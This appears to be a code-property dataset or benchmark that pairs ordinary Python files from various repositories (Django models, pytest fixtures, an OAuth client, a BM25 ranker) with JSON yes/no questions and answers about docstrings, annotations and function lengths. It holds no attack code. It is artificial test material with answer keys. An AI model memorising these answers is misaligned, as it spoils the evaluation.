entrada = str(input(esc)).replace(',','.')
if entrada.isalpha() or entrada.strip() == '':
print(f'ERRO: \"{entrada}\" é um Preço invalido')
else:
valido = True
return float(entrada)
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding sel... | 3 | PARTE_3/EX034/dado.py | 0Fernando0/CursoPython |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Interface Class
# this is a auto generated file generated by Cheetah
# Libre Office Version: 7.3
# Namespace: com.sun.star.animations
from abc import abstractproperty
from .x_animate import XAnimate as XAnimate_ca680c52
class XAnimateColor(XAnimate_ca680c52):
"""
Interface for animation by defining color changes over time.
Only color value will be legal values for the following members
See Also:
`API XAnimateColor <https://api.libreoffice.org/docs/idl/ref/interfacecom_1_1sun_1_1star_1_1animations_1_1XAnimateColor.html>`_
"""
__ooo_ns__: str = 'com.sun.star.animations'
__ooo_full_ns__: str = 'com.sun.star.animations.XAnimateColor'
__ooo_type_name__: str = 'interface'
__pyunointerface__: str = 'com.sun.star.animations.XAnimateColor'
@abstractproperty
def ColorInterpolation(self) -> int:
"""
defines the color space which is used to perform the interpolation.
"""
@abstractproperty
def Direction(self) -> bool:
"""
defines the direction which is used to perform the interpolation inside the color space defined with ColorInterpolation.
Values could be TRUE for clockwise and FALSE for counterclockwise.
This attribute will be ignored for color spaces where this does not make any sense.
"""
__all__ = ['XAnimateColor']
| [
{
"point_num": 1,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer"... | 3 | ooobuild/lo/animations/x_animate_color.py | Amourspirit/ooo_uno_tmpl |
#!/usr/bin/env python
# (C) Netflix 2014
"""Lint command tests
"""
from nflx_oc.commands.dev import lint
import os
import unittest
class TestModuleDiscovery(unittest.TestCase):
""""""
def setUp(self):
self.test_data_root = os.path.join(os.path.dirname(lint.__file__), 'testdata/lint')
self.prevdir = os.getcwd()
os.chdir(self.test_data_root)
def tearDown(self):
os.chdir(self.prevdir)
def test_module_discovery(self):
"""Test our lint wrapper module discovery
"""
self.assertEqual(lint.find_python_modules('package'), ['package'])
self.assertEqual(lint.find_python_modules('two-modules'), ['two-modules/a', 'two-modules/b'])
self.assertEqual(lint.find_python_modules('two-modules-and-one-nested'),
['two-modules-and-one-nested/a', 'two-modules-and-one-nested/b', 'two-modules-and-one-nested/d/d2'])
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | staging/commands/dev/test_lint.py | cligraphy/cligraphy |
class Point:
    """A 2-D point; the script below demonstrates class-attribute sharing."""

    # NOTE: `counter` is a CLASS attribute — one list shared by every
    # instance. The demo below relies on this aliasing behaviour.
    counter = []

    def __init__(self, x=0, y=0):
        """Point constructor."""
        self.x = x
        self.y = y

    def update(self, n):
        """Append n to the shared class-level counter list."""
        self.counter.append(n)


# p1.counter and p2.counter are the SAME list object, so every append and
# item assignment below is visible through both instances.
p1 = Point(0,0)
p2 = Point(1,1)
p1.counter.append(1)
p2.counter.append(3)
p1.counter[0] = 2
print(p1.counter)  # [2, 3]
print(p2.counter)  # [2, 3] — same list
p1.update(1)
print(p1.counter)  # [2, 3, 1]
print(p2.counter)  # [2, 3, 1]
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | zadanka/l5zad4.py | wrutkowski1000/wizualizacja-danych |
import pytest
from pages.aplication import Application
def pytest_addoption(parser):
    """Register the command-line options consumed by the `app` fixture."""
    parser.addoption('--browser_name', action='store', default="chrome", help="Choose browser: chrome or firefox")
    parser.addoption('--base_url', action='store', default='https://prodoctorov.ru/new/rate/doctor/12/'
                     , help="Choose base_url")
@pytest.fixture
def app(request):
    """Build the page-object Application for a test; quit the browser after.

    Browser and base URL come from the CLI options registered in
    pytest_addoption.
    """
    browser_name = request.config.getoption("--browser_name")  # CLI-selected browser
    base_url = request.config.getoption("--base_url")
    fixture = Application(browser_name=browser_name, base_url=base_url)
    yield fixture
    # Teardown: everything after `yield` runs once the dependent test ends.
    print("\nquit browser..")
    fixture.destroy()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | conftest.py | DedMazzai/feedback-form |
# Flipped to True once the native _C extension is successfully loaded.
_HAS_OPS = False


def _register_extensions():
    """Locate and load the compiled _C library so its custom ops register
    with torch."""
    import os
    import imp
    import torch

    # load the custom_op_library and register the custom ops
    lib_dir = os.path.dirname(__file__)
    _, path, _ = imp.find_module("_C", [lib_dir])
    torch.ops.load_library(path)


# Best-effort: the package still imports (without custom ops) when the
# native extension is missing or cannot be loaded.
try:
    _register_extensions()
    _HAS_OPS = True
except (ImportError, OSError):
    pass


def _check_cuda_version():
    """
    Make sure that CUDA versions match between the pytorch install and torchvision install
    """
    if not _HAS_OPS:
        return -1  # no native ops loaded, nothing to compare
    import torch
    _version = torch.ops.torchvision._cuda_version()
    if _version != -1 and torch.version.cuda is not None:
        # _version packs major/minor digits, e.g. 9020 -> 9.2, 10010 -> 10.1.
        tv_version = str(_version)
        if int(tv_version) < 10000:
            tv_major = int(tv_version[0])
            tv_minor = int(tv_version[2])
        else:
            tv_major = int(tv_version[0:2])
            tv_minor = int(tv_version[3])
        t_version = torch.version.cuda
        t_version = t_version.split('.')
        t_major = int(t_version[0])
        t_minor = int(t_version[1])
        if t_major != tv_major or t_minor != tv_minor:
            raise RuntimeError("Detected that PyTorch and torchvision were compiled with different CUDA versions. "
                               "PyTorch has CUDA Version={}.{} and torchvision has CUDA Version={}.{}. "
                               "Please reinstall the torchvision that matches your PyTorch install."
                               .format(t_major, t_minor, tv_major, tv_minor))
    return _version


_check_cuda_version()
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"ans... | 3 | torchvision/extension.py | jamt9000/vision |
from django.contrib.auth.hashers import make_password
from django.contrib.auth.models import User
from rest_framework import serializers
from profiles.models import Profile
class ProfileSerializer(serializers.ModelSerializer):
    """Serializes the notification-related fields of a user's Profile."""

    class Meta:
        model = Profile
        fields = ['notification_enabled', 'subscribed_services_notification']


class UserSerializer(serializers.ModelSerializer):
    """User serializer with an optional nested profile; hashes the password
    on create so the raw value is never stored."""

    profile = ProfileSerializer(required=False)
    # write_only so the (hashed) password is never echoed back in responses.
    password = serializers.CharField(
        write_only=True,
        required=True,
        help_text='Leave empty if no change needed',
        style={'input_type': 'password', 'placeholder': 'Password'}
    )

    def create(self, validated_data):
        # Replace the plaintext password with a salted hash before saving.
        validated_data['password'] = make_password(validated_data.get('password'))
        return super(UserSerializer, self).create(validated_data)

    class Meta:
        model = User
        fields = ['id', 'username', 'password', 'email', 'profile', 'first_name', 'last_name', 'is_staff',
                  'is_superuser', 'is_active']
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
}... | 3 | profiles/api/serializers/user_serializers.py | LaudateCorpus1/squest |
from typing import List, Dict, Sequence
import click
from valohai_cli.ctx import get_project
from valohai_cli.models.project import Project
from valohai_cli.range import IntegerRange
from valohai_cli.table import print_table
from valohai_cli.utils import subset_keys
def download_execution_data(project: Project, counters: Sequence[str]) -> Dict[str, dict]:
    """Fetch the executions selected by *counters* (a range expression),
    keyed by execution id."""
    executions = {}
    with click.progressbar(IntegerRange.parse(counters).as_set(), label='fetching information') as counter_iter:
        for counter in counter_iter:
            # Exclude heavyweight fields — only summary data is needed here.
            execution = project.get_execution_from_counter(counter=counter, params={
                'exclude': 'metadata,events,tags',
            })
            executions[execution['id']] = execution
    return executions


@click.command()
@click.argument('counters', required=True, nargs=-1)
def summarize(counters: List[str]) -> None:
    """
    Summarize execution metadata.

    Use the global `--table-format` switch to output JSON/TSV/CSV/...
    """
    project = get_project(require=True)
    assert project
    executions = download_execution_data(project, counters)
    all_metadata_keys = set()
    all_metadata = {}
    for execution in executions.values():
        # Executions that never ran have no metadata worth summarizing.
        if execution['status'] in ('created', 'queued'):
            continue
        cmeta = (execution.get('cumulative_metadata') or {})
        all_metadata_keys.update(set(cmeta.keys()))
        all_metadata[execution['counter']] = (execution, cmeta)
    # One table row per execution, sorted by counter.
    table_data = []
    for counter, (execution, metadata) in sorted(all_metadata.items()):
        row = subset_keys(execution, {'counter', 'id', 'duration'})
        row.update(metadata)
        table_data.append(row)
    columns = ['counter', 'duration'] + list(sorted(all_metadata_keys))
    headers = ['Execution', 'Duration'] + list(sorted(all_metadata_keys))
    print_table(table_data, columns=columns, headers=headers)
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": false
},
{
"point_num": 2,
"id": "all_return_types_annotated",
"question": "Does every function in this file have a return type annotation?",
"a... | 3 | valohai_cli/commands/execution/summarize.py | JohnCHarrington/valohai-cli |
from . import FixtureTest
class BusinessAndSpurRoutes(FixtureTest):
    """Check that business/spur route relations yield the expected
    `network` and `shield_text` values in the roads layer."""

    def _check_route_relation(
            self, rel_id, way_id, tile, shield_text, network):
        """Load the OSM relation fixture clipped to *tile* and assert that
        way *way_id* renders with the given shield text and network."""
        z, x, y = map(int, tile.split('/'))
        self.load_fixtures([
            'https://www.openstreetmap.org/relation/%d' % (rel_id,),
        ], clip=self.tile_bbox(z, x, y))
        # check that the member way of the relation above is given
        # a network that includes the business/spur extension.
        self.assert_has_feature(
            z, x, y, 'roads',
            {'id': way_id, 'shield_text': shield_text, 'network': network})

    def test_first_capitol_dr_i70_business(self):
        self._check_route_relation(
            1933234, 12276055, '16/16294/25097', '70', 'US:I:Business')

    def test_business_loop(self):
        self._check_route_relation(
            1935116, 5807439, '16/12285/23316', '15', 'US:I:Business:Loop')

    def test_nj_essex(self):
        self._check_route_relation(
            945855, 221295008, '16/19267/24623', '672', 'US:NJ:Essex:Spur')

    def test_nj_cr(self):
        self._check_route_relation(
            941526, 60523740, '16/19192/24767', '526', 'US:NJ:CR:Spur')
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than clas... | 3 | integration-test/1387-business-and-spur-routes.py | rinnyB/vector-datasource |
import requests
from collections import OrderedDict
from django.utils.http import urlencode
from allauth.socialaccount.providers.core.oauth2.client import (
OAuth2Client,
OAuth2Error,
)
class WeixinOAuth2Client(OAuth2Client):
    """OAuth2 client adapted to Weixin's parameter names (`appid`/`secret`)."""

    def get_redirect_url(self, authorization_url, extra_params):
        """Build the authorize URL; parameters are emitted in sorted order."""
        params = {
            'appid': self.consumer_key,
            'redirect_uri': self.callback_url,
            'scope': self.scope,
            'response_type': 'code'
        }
        if self.state:
            params['state'] = self.state
        params.update(extra_params)
        # Emit query parameters in deterministic (sorted) order.
        sorted_params = OrderedDict()
        for param in sorted(params):
            sorted_params[param] = params[param]
        return '%s?%s' % (authorization_url, urlencode(sorted_params))

    def get_access_token(self, code):
        """Exchange the authorization *code* for an access-token dict.

        Raises OAuth2Error when the response is not a valid token payload.
        """
        data = {'appid': self.consumer_key,
                'redirect_uri': self.callback_url,
                'grant_type': 'authorization_code',
                'secret': self.consumer_secret,
                'scope': self.scope,
                'code': code}
        params = None
        self._strip_empty_keys(data)
        url = self.access_token_url
        # GET endpoints receive the payload as query params instead of a body.
        if self.access_token_method == 'GET':
            params = data
            data = None
        # TODO: Proper exception handling
        resp = requests.request(self.access_token_method,
                                url,
                                params=params,
                                data=data)
        access_token = None
        if resp.status_code == 200:
            access_token = resp.json()
        if not access_token or 'access_token' not in access_token:
            raise OAuth2Error('Error retrieving access token: %s'
                              % resp.content)
        return access_token
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than ... | 3 | allauth/socialaccount/providers/other/weixin/client.py | Cairnica/django-allauth |
# coding: utf-8
from dj_diabetes.models.appointments import Appointments
from django import forms
class AppointmentsForm(forms.ModelForm):
    """
    Appointments Form
    """
    # Explicit widgets so every field renders with the Bootstrap
    # "form-control" class; `body` gets a 3-row textarea.
    title = forms.CharField(widget=forms.TextInput(
        attrs={'class': 'form-control'}))
    body = forms.CharField(widget=forms.Textarea(
        attrs={'class': 'form-control', 'rows': '3'}))
    recall_one_duration = forms.IntegerField(widget=forms.TextInput(
        attrs={'class': 'form-control', 'type': 'number'}))
    recall_two_duration = forms.IntegerField(widget=forms.TextInput(
        attrs={'class': 'form-control', 'type': 'number'}))
    recall_one_unit = forms.IntegerField(widget=forms.TextInput(
        attrs={'class': 'form-control', 'type': 'number'}))
    recall_two_unit = forms.IntegerField(widget=forms.TextInput(
        attrs={'class': 'form-control', 'type': 'number'}))
    date_appointments = forms.DateField(widget=forms.TextInput(
        {'class': 'form-control'}))
    hour_appointments = forms.TimeField(widget=forms.TextInput(
        {'class': 'form-control'}))

    class Meta:
        model = Appointments
        fields = ['appointment_types', 'title', 'body',
                  'date_appointments', 'hour_appointments',
                  'recall_one_duration', 'recall_two_duration',
                  'recall_one_unit', 'recall_two_unit']

    def __init__(self, *args, **kwargs):
        super(AppointmentsForm, self).__init__(*args, **kwargs)
        # The ModelForm-generated select also needs the Bootstrap class.
        self.fields['appointment_types'].widget.attrs['class'] = 'form-control'
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": false
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
}... | 3 | dj_diabetes/forms/appointments.py | foxmask/dj-diabetes |
#!/usr/bin/env python3
import sys
from functools import reduce
# Maps one map cell to a hit count: '#' (tree) -> 1, anything else -> 0.
tree_encounter_check = lambda pos: 1 if pos == "#" else 0


def main(forest):
    """Run every puzzle slope over *forest* and print the product of hits."""
    slope_mode = [
        (1, 1),
        (3, 1),
        (5, 1),
        (7, 1),
        (1, 2),
    ]
    mode_to_result = [(mode, resolve_encounters(forest, *mode)) for mode in slope_mode]
    for mode, result in mode_to_result:
        print(f"For {mode}, encounters={result}")
    results = [r for _, r in mode_to_result]
    # Part-two answer: multiply the tree counts of all slopes together.
    result = reduce(lambda x, y: x * y, results)
    print(f"product({','.join(str(r) for r in results)}) = {result}")
def resolve_encounters(forest, shift_right, shift_bottom, verbose = "-v" in sys.argv) -> int:
    """Count the trees ('#') hit while descending *forest* at the given slope.

    The map repeats infinitely to the right (the column wraps modulo the row
    width); rows whose index is not a multiple of *shift_bottom* are skipped.

    :param forest: list of equally wide strings; '#' marks a tree
    :param shift_right: columns moved right per step
    :param shift_bottom: rows moved down per step
    :param verbose: echo the annotated map (default: '-v' on the command line)
    :return: number of tree cells visited, including the starting cell
    """
    if not forest:
        return 0  # robustness: an empty map has no encounters
    map_length = len(forest[0])
    # The starting position counts as an encounter if it holds a tree.
    n_tree_encounter = 1 if forest[0][0] == "#" else 0
    column = shift_right  # column to inspect on the next visited row
    if verbose:
        print(f">> For Right {shift_right}, Down {shift_bottom}")
        print(("X" if forest[0][0] == "#" else "O") + forest[0][1:])
    for row, line in enumerate(forest[1:]):
        if (row + 1) % shift_bottom != 0:
            if verbose:
                print(line)
            continue
        column_rel = column % map_length  # wrap around the repeating map
        hit = line[column_rel] == "#"
        if hit:
            n_tree_encounter += 1
        if verbose:
            print(line[:column_rel] + ("X" if hit else "O") + line[column_rel + 1:])
        # Advance only on visited rows.
        column += shift_right
    return n_tree_encounter
if __name__ == '__main__':
    # Usage: tree-encounters-v2.py <map-file> [-v]
    main([i.strip() for i in open(sys.argv[1]).readlines()])
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fal... | 3 | d3/tree-encounters-v2.py | pgreze/adventofcode |
#
# Copyright 2021 Budapest Quantum Computing Group
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from theboss.boson_sampling_utilities.permanent_calculators.glynn_gray_permanent_calculator import ( # noqa: E501
GlynnGrayPermanentCalculator,
)
def _permanent(matrix, rows, columns, calculator_class):
    """Instantiate *calculator_class* for the given data and run it."""
    return calculator_class(matrix, rows, columns).compute_permanent()


def glynn_gray_permanent(matrix, rows, columns):
    """Compute the permanent of *matrix* with the Glynn/Gray-code calculator."""
    return _permanent(
        matrix, rows, columns, calculator_class=GlynnGrayPermanentCalculator
    )
| [
{
"point_num": 1,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docst... | 3 | piquasso/_math/permanent.py | antalszava/piquasso |
from django.db import models
from django.conf import settings
from django.contrib.auth.models import User
from django.db.models.signals import post_save
# Create your models here.
# Create your models here.
class Profile(models.Model):
    """Per-user extra data: avatar, birth date and course bookmarks."""
    user = models.OneToOneField(settings.AUTH_USER_MODEL)
    date_of_birth = models.DateField(blank=True, null=True)
    photo = models.ImageField(upload_to='users/%Y/%m/%d', blank=True)
    # Bookmarks presumably track the last course/module visited so the user
    # can resume — confirm against the views that read them.
    course_bookmark = models.CharField(max_length=100, default='the-strategy')
    module_bookmark = models.PositiveIntegerField(default=0)

    def __str__(self):
        return 'Profile for user {}'.format(self.user.username)


class Contact(models.Model):
    """A directed follow edge: user_from follows user_to."""
    user_from = models.ForeignKey(User, related_name='rel_from_set')
    user_to = models.ForeignKey(User, related_name='rel_to_set')
    created = models.DateTimeField(auto_now_add=True, db_index=True)

    class Meta:
        ordering = ('-created',)

    def __str__(self):
        return '{} follows {}'.format(self.user_from, self.user_to)


# Monkey-patch a self-referential, asymmetric M2M onto the auth User model,
# routed through Contact so each edge carries a timestamp.
User.add_to_class('following', models.ManyToManyField('self',
                                                      through=Contact,
                                                      related_name='followers',
                                                      symmetrical=False))


# Signal to auto-create a profile when a User is created.
def create_user_profile(sender, instance, created, **kwargs):
    """post_save receiver: create an empty Profile for each new User."""
    if created:
        Profile.objects.create(user=instance)


post_save.connect(create_user_profile, sender=User)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | account/models.py | pauljherrera/avantiweb |
import urllib.request
import feedparser
import ujson
from centrifuge.domain import document as ad
class CrawlerArxivRepo:
    """
    This is a helper class to parse arxiv.org site.
    It uses the arxiv.org REST API to search for articles.
    based on karpathy's arxiv-sanity:
    https://github.com/karpathy/arxiv-sanity-preserver/blob/master/fetch_papers.py
    and arxiv example:
    https://arxiv.org/help/api/examples/python_arXiv_parsing_example.txt
    """

    # Base api query url
    base_url = 'https://keepcurrent-crawler.herokuapp.com/'

    def list(self, filters=None):
        """Return all papers; note that filtering is not implemented, so a
        truthy *filters* makes this return None."""
        if not filters:
            return self.fetch_papers()

    def run_query(self):
        """GET <base_url>arxiv and return the JSON-decoded payload."""
        query = 'arxiv'
        with urllib.request.urlopen(self.base_url+query) as url:
            response = url.read()
            parsed_response = ujson.loads(response)
        return parsed_response

    def fetch_papers(
            self
    ):
        """
        fetch results from our crawler
        """
        # num_added_total = 0
        parsed_response = self.run_query()
        return parsed_response
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | centrifuge/repository/crawler_arxiv_repo.py | datadonK23/Engine |
from genmod.vcf_tools.header_parser import HeaderParser
def test_parse_info():
    """An ##INFO meta line registers its ID in head.info_dict."""
    ## GIVEN a header object
    head = HeaderParser()
    assert 'MQ' not in head.info_dict
    info_line = '##INFO=<ID=MQ,Number=1,Type=Float,Description="RMS Mapping Quality">'
    ## WHEN parsing a correct info line
    head.parse_meta_data(info_line)
    ## THEN assert it is added to the parser
    assert 'MQ' in head.info_dict


def test_parse_contig():
    """A full ##contig line registers its ID in head.contig_dict."""
    ## GIVEN a header object
    head = HeaderParser()
    assert '1' not in head.contig_dict
    contig_line = '##contig=<ID=1,length=249250621,assembly=b37>'
    ## WHEN parsing a correct info line
    head.parse_meta_data(contig_line)
    ## THEN assert it is added to the parser
    assert '1' in head.contig_dict


def test_parse_contig_no_length():
    """A ##contig line without a length attribute still parses."""
    ## GIVEN a header object
    head = HeaderParser()
    assert '1' not in head.contig_dict
    contig_line = '##contig=<ID=1,assembly=b37>'
    ## WHEN parsing a correct info line
    head.parse_meta_data(contig_line)
    ## THEN assert it is added to the parser
    assert '1' in head.contig_dict


def test_parse_minimal_contig():
    """A ##contig line with only an ID still parses."""
    ## GIVEN a header object
    head = HeaderParser()
    assert '1' not in head.contig_dict
    contig_line = '##contig=<ID=1>'
    ## WHEN parsing a correct info line
    head.parse_meta_data(contig_line)
    ## THEN assert it is added to the parser
    assert '1' in head.contig_dict
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",... | 3 | tests/vcf_tools/test_header_parser.py | Varstation/genmod |
import unittest
class Node:
    """Graph node holding a value, an adjacency list and a BFS visited flag."""

    def __init__(self, val, adjacent=None):
        self.val = val
        self.adjacent = adjacent  # list of neighbour Nodes, or None
        self._marked = False  # visited flag used by the BFS route search

    @property
    def marked(self):
        """Whether the node has been visited by the current search."""
        return self._marked

    @marked.setter
    def marked(self, value):
        # Only genuine booleans are accepted (ints are rejected).
        if isinstance(value, bool):
            self._marked = value
        else:
            raise TypeError("Value is not a boolean")

    def addEdge(self, node):
        """Append *node* to this node's adjacency list.

        Bug fix: the original did `self.adjacent += [node]`, which raised
        TypeError for nodes created with the default `adjacent=None`; the
        list is now created lazily.
        """
        if self.adjacent is None:
            self.adjacent = []
        self.adjacent.append(node)
class Queue:
    """A minimal FIFO queue over a plain Python list."""

    def __init__(self, listQueue=None):
        self.listQueue = listQueue

    def addElement(self, val):
        """Enqueue *val*; returns the backing list."""
        self.listQueue.append(val)
        return self.listQueue

    def removeElement(self):
        """Dequeue and return the oldest element, or None when empty."""
        if not self.listQueue:
            return None
        return self.listQueue.pop(0)
def routebtwNodes(start,end):
    """Breadth-first search: True if *end* is reachable from *start*.

    Visited nodes are marked in place; call resetMarked on all nodes before
    reusing the same graph.
    """
    if start == end:
        return True
    thequeue = Queue([])
    node_s = start
    node_s.marked = True
    thequeue.addElement(node_s)
    while thequeue.listQueue:
        node_r = thequeue.removeElement()
        if node_r.adjacent != None:
            for r in node_r.adjacent:
                if r.marked == False:
                    # NOTE(review): the target is matched by value, not
                    # identity — assumes node values are unique; confirm.
                    if r.val == end.val:
                        return True
                    else:
                        thequeue.addElement(r)
                        r.marked = True
    return False


def resetMarked(nodes):
    """Clear the visited flag on every node so a new search can run."""
    for i in nodes:
        i.marked = False
class Test(unittest.TestCase):
    """Route-existence checks over a small hand-built directed graph."""

    def test_routebtwNodes(self):
        # Graph: E -> A -> {D, B}, B -> {C, A}; C and D have no out-edges.
        node_c = Node('C')
        node_d = Node('D')
        node_b = Node('B', [node_c])
        node_a = Node('A',[node_d,node_b])
        node_e = Node('E',[node_a])
        node_b.addEdge(node_a)
        nodes = [node_a,node_b,node_c,node_d,node_e]
        # Each case: [start, end, expected reachability].
        testCases = [[node_e,node_e,True],
                     [node_a,node_b,True],
                     [node_b,node_a,True],
                     [node_e,node_c,True],
                     [node_d,node_c,False]
                     ]
        for case in testCases:
            print('(node_' + case[0].val + ',node_' + case[1].val + ')' + ' ' + str(case[2]))
            self.assertEqual(routebtwNodes(case[0],case[1]),case[2])
            # Marks persist across searches; reset before the next case.
            resetMarked(nodes)


if __name__ == '__main__':
    unittest.main()
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | ch-04-TreesGraphs/routebtwNodes.py | jgraille/CtCy-6th-Edition-Python- |
from mxnet import nd
from mxnet.gluon import nn
# LeNet-style CNN: two conv/pool stages followed by three dense layers.
net = nn.Sequential()
net.add(
    nn.Conv2D(
        channels=6,
        kernel_size=5,
        activation='relu'),
    nn.MaxPool2D(pool_size=2, strides=2),
    nn.Conv2D(
        channels=16,
        kernel_size=3,
        activation='relu'),
    nn.MaxPool2D(pool_size=2, strides=2),
    nn.Dense(120, activation='relu'),
    nn.Dense(84, activation='relu'),
    nn.Dense(10))
net.initialize()
# Forward a dummy batch of four 1x28x28 images; Gluon infers layer shapes
# on this first call.
x = nd.random.uniform(
    shape=(4, 1, 28, 28))
y = net(x)
print(y.shape)


class MixMLP(nn.Block):
    """Small MLP mixing a Sequential sub-block with a standalone Dense layer."""

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.blk = nn.Sequential()
        self.blk.add(
            nn.Dense(3, activation='relu'),
            nn.Dense(4, activation='relu'))
        self.dense= nn.Dense(5)

    def forward(self, x):
        y = nd.relu(self.blk(x))
        # NOTE(review): debug print left in the forward pass — runs on every
        # call; consider removing.
        print(y)
        return self.dense(y)


net = MixMLP()
print(net)
net.initialize()
x = nd.random.uniform(shape=(2,2))
print(net(x))
# Inspect the initialized weights of the second Dense layer in the sub-block.
print(net.blk[1].weight.data())
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
... | 3 | ml/mxnet/tutorial/02_create_neural_net.py | rrbb014/rrbb-playground |
# -*- coding: utf-8 -*-
import json
from wechatpy.session import SessionStorage
from wechatpy.utils import to_text
class MemcachedStorage(SessionStorage):
    """Session storage backed by a memcached client; values stored as JSON."""

    def __init__(self, mc, prefix='wechatpy'):
        # Duck-type check: any client exposing get/set/delete will do.
        for method_name in ('get', 'set', 'delete'):
            assert hasattr(mc, method_name)
        self.mc = mc
        self.prefix = prefix

    def key_name(self, key):
        """Namespace *key* with the configured prefix."""
        return '{0}:{1}'.format(self.prefix, key)

    def get(self, key, default=None):
        """Return the JSON-decoded value for *key*, or *default* if absent."""
        key = self.key_name(key)
        value = self.mc.get(key)
        if value is None:
            return default
        return json.loads(to_text(value))

    def set(self, key, value, ttl=0):
        """JSON-encode and store *value*; None values are silently skipped."""
        if value is None:
            return
        key = self.key_name(key)
        value = json.dumps(value)
        self.mc.set(key, value, ttl)

    def delete(self, key):
        """Remove *key* from the cache."""
        key = self.key_name(key)
        self.mc.delete(key)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | wechatpy/session/memcachedstorage.py | messense/wechatpy |
from dataloader import AmazonProductDataloader
from inverted_index import InvertedIndex
from utils import preprocess_text
import numpy as np
class BM25SearchRelevance:
    """Rank documents from an inverted index against a query with Okapi BM25."""

    def __init__(self, inverted_index, b=0.65, k1=1.6):
        self.inverted_index = inverted_index
        self.b = b  # length-normalization strength
        self.k1 = k1  # term-frequency saturation
        # Total number of indexed documents (rows of the underlying dataset).
        self.total_documents = inverted_index.dataloader.dataset.shape[0]

    def score_query(self, query, k=3):
        """Return up to *k* document ids with the highest BM25 score for *query*."""
        scores = {}
        preprocessed_query = preprocess_text(query, tokens_only=True)
        for query_term in preprocessed_query:
            if query_term in self.inverted_index.term_dictionary:
                term_frequencies = self.inverted_index.term_dictionary[query_term]
                # Document frequency = number of postings for this term.
                # (Bug fix: the original used len() of a single posting dict.)
                document_frequency = len(term_frequencies)
                for term_frequency in term_frequencies:
                    doc = term_frequency["document"]
                    scores[doc] = scores.get(doc, 0) + self.bm25_score(
                        term_frequency["frequency"],
                        document_frequency,
                        term_frequency["document_length"],
                    )
        # Highest score first. (Bug fix: the original double sort re-ordered
